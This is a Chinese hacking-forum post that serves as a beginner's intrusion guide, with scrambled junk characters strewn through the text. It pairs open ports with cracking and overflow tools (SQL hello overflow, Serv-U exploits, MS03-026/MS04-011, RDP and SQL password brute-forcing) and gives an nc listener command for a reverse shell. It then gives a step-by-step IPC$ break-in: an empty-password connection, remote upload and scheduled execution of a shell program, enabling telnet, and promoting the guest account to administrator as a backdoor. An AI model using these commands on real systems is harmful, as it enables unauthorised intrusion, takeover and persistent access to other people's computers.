TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu8 J: y1 A4 B& r$ e$ ]( c( X
希望对新手入侵有帮助!
2 E {4 ]/ d" K0 g 1. 1433端口入侵
" b1 q3 d; O& @% I% O5 u scanport.exe 查有1433的机器/ Y7 G$ A& k7 {" d; Z$ X
SQLScanPass.exe 进行字典暴破(字典是关键)! g, {% d# n8 U
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
0 P" _: ~' \( y% ~ nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
: s2 r6 d- [; x/ b (以上反向的,测试成功). F, q5 w* F J; e/ o# h8 c9 M! l
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)& a3 _$ L+ O! ]
2. 4899端口入侵
- \+ o1 A! y! l* w: z( c2 I 用4899过滤器.exe,扫描空口令的机器
3 d0 G8 a" G- b$ s% S 3. 3899的入侵7 I; H! X. h: O# d7 q
对很早的机器,可以试试3389的溢出(win3389ex.exe)
$ x+ A$ |3 h, I r, p. w 对2000的机器,可以试试字典暴破。(tscrack.exe)
6 r. B% G$ @, X4 H" X 4. 80入侵: `7 i# N+ f! e. V3 K6 y
对sp3以前的机器,可以用webdav入侵;% f4 D* B0 q9 O* V$ r) j, r
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe), Q& u' S( `! u9 z7 e
可以利用SQL进行注入。(啊D的注入软件)。
$ E$ [: c& i& ~4 `; A$ | 5. serv-u入侵(21端口)8 [7 e- A2 k g$ E6 `1 f
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
- M& z0 A" F* Y) U \ 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)" R3 Y1 N) n, G& B: I( I
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
) U( I! [: p% Q& t- b 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
4 A8 s& g, b& \0 q$ y. E 6. 554端口
, }6 D! P- M( M8 t% J7 f 用real554.exe入侵。
/ x% ~6 m* R- _ 7. 6129端口/ y$ {% i0 l! ?
用DameWare6129.exe入侵。: e2 W1 N' ]% u _8 ~- N: r) l
8. 系统漏洞+ D- p$ q" l6 U7 _1 L6 V! r. V
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
$ y. ]+ f0 j9 @5 `" M9. 3127等端口
* e% e p' x/ z# D2 _ Q
. m% V, Y) z S1 s 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。" Y* p, o- M* \/ C
10. 其他入侵
5 a+ ?5 D, J# H! e 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
0 B: L2 l1 t6 z
8 o- D. H( i7 c( ]% h* k; R! h 经典IPC$入侵' v- |' i% V( `" B$ c3 c" j0 m
8 j8 ~ b7 L- U1 P1 b( v
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
6 Q4 X) V2 h$ Q; s. k7 R9 i' k 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
6 P) _' }6 }% Z- i9 i7 | 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
" S4 L$ o; E/ m1 {/ Z$ P 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
$ s5 g$ F+ ]2 ?8 Q0 F+ { 3. C:\>net time file://127.0.0.1/
/ y9 }/ d9 Q4 m 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
( E1 g0 ~$ D$ _. c 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
( K2 W5 ?* H8 `, h& {: u2 ? 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
# g, z& M2 Q; u9 `8 [ 5. C:\>net time file://127.0.0.1/
8 F* X& `* U( ? 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6 w2 W! {) |2 G* K' m, Y 6. C:\>telnet 127.0.0.1 996 g; V% [9 ~$ l! T
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。7 i) V4 }5 _) |$ L: h* w
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了5 l, `& t: `( @; H: ^* }2 j
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
1 A7 e* B* l; Q 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
2 E- k, T/ Q# o- r8 \9 s& n 8. C:\WINNT\system32>ntlm7 F, n# V2 I4 f7 i
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!2 f' w! B a7 ~. }8 i1 Q" ^5 x
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
/ N/ ]+ e* b( Q& p 10. C:\>net user guest /active:yes
8 C& D; t/ z! K: n 将对方的Guest用户激活; l' o" @3 h+ ^" T! `
11. C:\>net user guest 1234; q' h# v+ X( N1 y
将Guest的密码改为1234,或者你要设定的密码6 b% {1 a4 N/ D# V
12. C:\>net localgroup administrators guest /add2 q8 `" V# Z7 T% B/ ^9 B5 H
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|